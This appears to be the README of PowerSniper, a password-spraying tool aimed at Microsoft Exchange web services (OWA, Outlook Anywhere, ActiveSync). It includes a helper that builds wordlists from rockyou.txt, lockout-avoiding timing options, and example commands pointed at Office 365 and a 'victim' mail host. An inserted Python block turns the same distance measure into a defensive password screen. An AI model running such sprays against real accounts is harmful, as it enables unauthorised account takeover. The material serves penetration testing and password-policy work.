PowerSniper

Password spraying script and helper for creating password lists.

The Python script uses configurable parameters to extract complex passwords from a password list such as rockyou.txt. It then computes the Damerau-Levenshtein distance between each extracted password and a list of common passwords (the text file in this repository contains the top 20 most common rockyou passwords that could easily be modified into a complex password, i.e. not the ones that are all digits). The maximum distance at which a password is kept is configurable, with a default of 4, and the results are written to a CSV file.
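The same distance measure works as a password-change screen. The block below is an added example, not code from this repository: it implements Damerau-Levenshtein distance in plain Python (passdist.py uses jellyfish for this) and flags a candidate that lies within the default distance of 4 of a common password, even when it passes a complexity rule. The `COMMON` list, the function names and the three-of-four character-class rule are assumptions made for illustration.

```python
import string

# Constructed stand-in for toplist_rockyou.txt (sample values, not the repository file).
COMMON = ["password", "iloveyou", "princess"]

def damerau_levenshtein(a, b):
    """Unrestricted Damerau-Levenshtein: insert, delete, substitute, transpose."""
    inf = len(a) + len(b)
    last_row = {}  # last row (1-based) in which each character of `a` was seen
    # The table is shifted by one row and column to hold an `inf` border.
    d = [[inf] * (len(b) + 2) for _ in range(len(a) + 2)]
    for i in range(len(a) + 1):
        d[i + 1][1] = i
    for j in range(len(b) + 1):
        d[1][j + 1] = j
    for i in range(1, len(a) + 1):
        last_col = 0  # last column in this row where the characters matched
        for j in range(1, len(b) + 1):
            k, l_col = last_row.get(b[j - 1], 0), last_col
            cost = 1
            if a[i - 1] == b[j - 1]:
                cost, last_col = 0, j
            d[i + 1][j + 1] = min(
                d[i][j] + cost,                               # match or substitute
                d[i + 1][j] + 1,                              # insert
                d[i][j + 1] + 1,                              # delete
                d[k][l_col] + (i - k - 1) + 1 + (j - l_col - 1),  # transpose
            )
        last_row[a[i - 1]] = i
    return d[len(a) + 1][len(b) + 1]

def is_complex(pw):
    """Assumed rule: at least three of lower, upper, digit, symbol."""
    classes = [string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation]
    return sum(any(c in cls for c in pw) for cls in classes) >= 3

def nearest_common(candidate, common=COMMON):
    """Return (closest common password, distance); comparison is case-sensitive."""
    return min(((w, damerau_levenshtein(candidate, w)) for w in common),
               key=lambda pair: pair[1])

def should_reject(candidate, common=COMMON, max_dist=4):
    """True when the candidate is within max_dist edits of a common password."""
    return nearest_common(candidate, common)[1] <= max_dist

if __name__ == "__main__":
    for pw in ["P@ssw0rd1", "Princess1!", "vK7#tq9LmZx2"]:
        print(pw, is_complex(pw), nearest_common(pw), should_reject(pw))
```
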

The PowerShell script loops through usernames and passwords and attempts to authenticate with them against various Microsoft Exchange web-based services.  The script supports pausing after a specified lockout count for a specified period of time to prevent account lockouts.

PowerSniper supports password spraying against the following services at this time:

  • Outlook Web Access
  • Outlook Anywhere
  • ActiveSync

The code that loads the Microsoft.Exchange.WebServices.dll for Outlook Anywhere authentication was found in the MailSniper tool (https://github.com/dafthack/MailSniper) created by @dafthack.

Requirements

passdist.py requires jellyfish

Usage

    usage: rockdist.py [-h] --wordlist WORDLIST --toplist TOPLIST [--output OUTPUT] [--passmin PASSMIN]
                       [--passmax PASSMAX] [--complex] [--passdist PASSDIST]

    Get the distances between complex passwords and top passwords used

    optional arguments:
      -h, --help           show this help message and exit
      --wordlist WORDLIST  the file with the complex rockyou passwords (default: None)
      --toplist TOPLIST    the file with the top rockyou passwords (default: None)
      --output OUTPUT      the CSV output of the analysis (default: analysis.csv)
      --passmin PASSMIN    the minimum size password to choose from (default: 7)
      --passmax PASSMAX    the maximum size password to choose from (default: 12)
      --complex            require complex passwords (default: 0)
      --passdist PASSDIST  the maximum distance between passwords to keep (default: 4)

Example passdist.py command:

    python passdist.py --wordlist rockyou.txt --toplist toplist_rockyou.txt --output lowdist.csv --passmin 7 --passmax 12 --complex --passdist 4

NAME
  Invoke-PowerSniper
  
SYNOPSIS    
  This module loops through usernames and passwords and attempts to authenticate with them against various 
  Microsoft Exchange web-based services.
  
    PowerSniper Function: Invoke-PowerSniper    
    Author: Josh Berry (@codewatchorg)    
    License: BSD 3-Clause    
    Required Dependencies: None    
    Optional Dependencies: None

SYNTAX    
  Invoke-PowerSniper [[-uri] <Object>] [[-svc] <Object>] [[-userlist] <Object>] 
      [[-passlist] <Object>] [[-sos] <Object>] [[-lockout] <Object>] 
      [[-locktime] <Object>] [<CommonParameters>]

DESCRIPTION    
  This module loops through usernames and passwords and attempts to authenticate with them against 
  various Microsoft Exchange web-based services.  The script supports pausing after a specified 
  lockout count for a specified period of time to prevent account lockouts.

RELATED LINKS    
  https://blogs.technet.microsoft.com/meamcs/2015/03/06/powershell-script-to-simulate-outlook-web-access-url-user-logon/
  http://mobilitydojo.net/2010/03/30/rolling-your-own-exchange-activesync-client/
  http://mobilitydojo.net/2011/08/24/exchange-activesync-building-blocks-first-sync/
  http://mobilitydojo.net/files/EAS_BB/Part_02/HTTP_GET.cs
  https://blogs.technet.microsoft.com/heyscriptingguy/2011/12/02/learn-to-use-the-exchange-web-services-with-powershell/
  http://stackoverflow.com/questions/1582285/how-to-remove-elements-from-a-generic-list-while-iterating-over-it
  https://github.com/dafthack/MailSniper

Example PowerSniper.ps1 usage:

    # Outlook Anywhere Test
    Invoke-PowerSniper -uri https://outlook.office365.com -svc oa -userlist users.txt -passlist passwords.txt `
        -sos false -lockout 6 -locktime 30

    # ActiveSync Test
    Invoke-PowerSniper -uri https://outlook.office365.com -svc as -userlist users.txt -passlist passwords.txt `
        -sos false -lockout 6 -locktime 30

    # Outlook Web Access Test
    Invoke-PowerSniper -uri https://mail.victim.com/owa/auth.owa -svc owa -userlist users.txt `
        -passlist passwords.txt -sos false -lockout 6 -locktime 30